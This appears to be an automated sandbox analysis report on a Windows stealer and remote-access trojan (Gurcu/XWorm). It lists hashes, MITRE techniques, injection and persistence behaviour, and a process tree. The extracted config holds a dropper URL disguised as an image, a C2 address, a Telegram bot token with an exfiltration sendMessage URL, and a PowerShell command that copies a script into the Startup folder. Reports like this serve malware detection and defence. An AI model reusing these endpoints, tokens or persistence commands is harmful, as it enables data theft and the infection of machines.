gurcu | 31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad

Analysis

max time kernel
144s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
Size

2.1MB
MD5

8c04e5d5adaf15173fecd9384ceda14d
SHA1

9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
SHA256

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
SHA512

7616ce8a0728abedb084c516b47fe45b7af264458d9fa4edccebbd2f8e77fbc17a703f06e8e23b9c618a45176a6073f6a5b0727619adf30f620eac062d58c0fe
SSDEEP

24576:X40Bg3buy6rMn3I5bF2Wlo7XGc6okgFZ5A1WqJlLsYpd+wyQn652pBJTu:DCruyinbFOR6PgFZmMqJ19pd+wpXa

Score

10^/10

gurcu xworm discovery execution persistence rat stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

exe.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

exe.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

Extracted

Family

xworm

Version

5.0

172.214.220.82:5555

Mutex

XjG17XjAty4BSeG3

Attributes

Install_directory
%LocalAppData%
install_file
sys32.exe
telegram
https://api.telegram.org/bot7375017271:AAEAqNiylxrFjGgvlGU0if1BBlKDJQLHYkw

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7375017271:AAEAqNiylxrFjGgvlGU0if1BBlKDJQLHYkw/sendMessage?chat_id=-4592360412

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2032-199-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 8 IoCs

Processes:

wscript.exewscript.exepowershell.exepowershell.exe

flow	pid	process
24	820	wscript.exe
25	2892	wscript.exe
26	820	wscript.exe
27	2892	wscript.exe
34	3064	powershell.exe
35	516	powershell.exe
40	516	powershell.exe
41	3064	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4800 powershell.exe
1684 powershell.exe
3064 powershell.exe
516 powershell.exe
1336 powershell.exe
5000 powershell.exe

pid	process
4800	powershell.exe
1684	powershell.exe
3064	powershell.exe
516	powershell.exe
1336	powershell.exe
5000	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exewscript.exewscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 6 IoCs

Processes:

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exewscript.exeAppLaunch.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys32.js.bat	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys64.js.bat	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AppLaunch.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AppLaunch.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\certeiramente.js"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\latinas.js"	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 3064 set thread context of 2032	3064	powershell.exe	AppLaunch.exe
PID 516 set thread context of 2356	516	powershell.exe	AddInProcess32.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RdrCEF.exeRdrCEF.exeAcroRd32.exeRdrCEF.exeRdrCEF.exeAppLaunch.exeAddInProcess32.exeRdrCEF.exeRdrCEF.exeRdrCEF.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXEcmd.exePING.EXE

pid process

1772 cmd.exe
380 PING.EXE
2988 cmd.exe
544 PING.EXE

pid	process
1772	cmd.exe
380	PING.EXE
2988	cmd.exe
544	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

544 PING.EXE
380 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	cmd.exe

pid	process
544	PING.EXE
380	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAcroRd32.exe

pid	process
1336	powershell.exe
1336	powershell.exe
1336	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
1684	powershell.exe
1684	powershell.exe
3064	powershell.exe
3064	powershell.exe
1684	powershell.exe
3064	powershell.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAppLaunch.exeAddInProcess32.exe

description	pid	process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	2032	AppLaunch.exe
Token: SeDebugPrivilege	2356	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

1728 AcroRd32.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

AcroRd32.exe

pid process

1728 AcroRd32.exe
1728 AcroRd32.exe
1728 AcroRd32.exe
1728 AcroRd32.exe
1728 AcroRd32.exe

pid	process
1728	AcroRd32.exe

pid	process
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe
1728	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.execmd.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4996 wrote to memory of 2288	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 4996 wrote to memory of 2288	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 2288 wrote to memory of 1728	2288	cmd.exe	AcroRd32.exe
PID 2288 wrote to memory of 1728	2288	cmd.exe	AcroRd32.exe
PID 2288 wrote to memory of 1728	2288	cmd.exe	AcroRd32.exe
PID 4996 wrote to memory of 708	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 4996 wrote to memory of 708	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 4996 wrote to memory of 820	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	wscript.exe
PID 4996 wrote to memory of 820	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	wscript.exe
PID 4996 wrote to memory of 2892	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	wscript.exe
PID 4996 wrote to memory of 2892	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	wscript.exe
PID 4996 wrote to memory of 1756	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 4996 wrote to memory of 1756	4996	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	cmd.exe
PID 1728 wrote to memory of 5076	1728	AcroRd32.exe	RdrCEF.exe
PID 1728 wrote to memory of 5076	1728	AcroRd32.exe	RdrCEF.exe
PID 1728 wrote to memory of 5076	1728	AcroRd32.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 1224	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe
PID 5076 wrote to memory of 760	5076	RdrCEF.exe	RdrCEF.exe

C:\Users\Admin\AppData\Local\Temp\31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
"C:\Users\Admin\AppData\Local\Temp\31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Windows\system32\cmd.exe
  "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5076
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3E84AF2C158C1180C2323B2766967AB4 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1224
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC66A7140BDACD8495C06F35F5510AF9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC66A7140BDACD8495C06F35F5510AF9 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:760
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=004B46485D65DEB9D5BF6DA4F81F5C2C --mojo-platform-channel-handle=2300 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4140
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=621C6D0A37A3EA753A07F2719830976C --mojo-platform-channel-handle=2440 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3824
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8E2AAF02F2BA5283CE7546E89DAB698F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8E2AAF02F2BA5283CE7546E89DAB698F --renderer-client-id=6 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:688
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CAEDD80B6AA3877A1C4F21A6A678A0FF --mojo-platform-channel-handle=2360 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4156
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:708
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\sys32.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys32.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2988
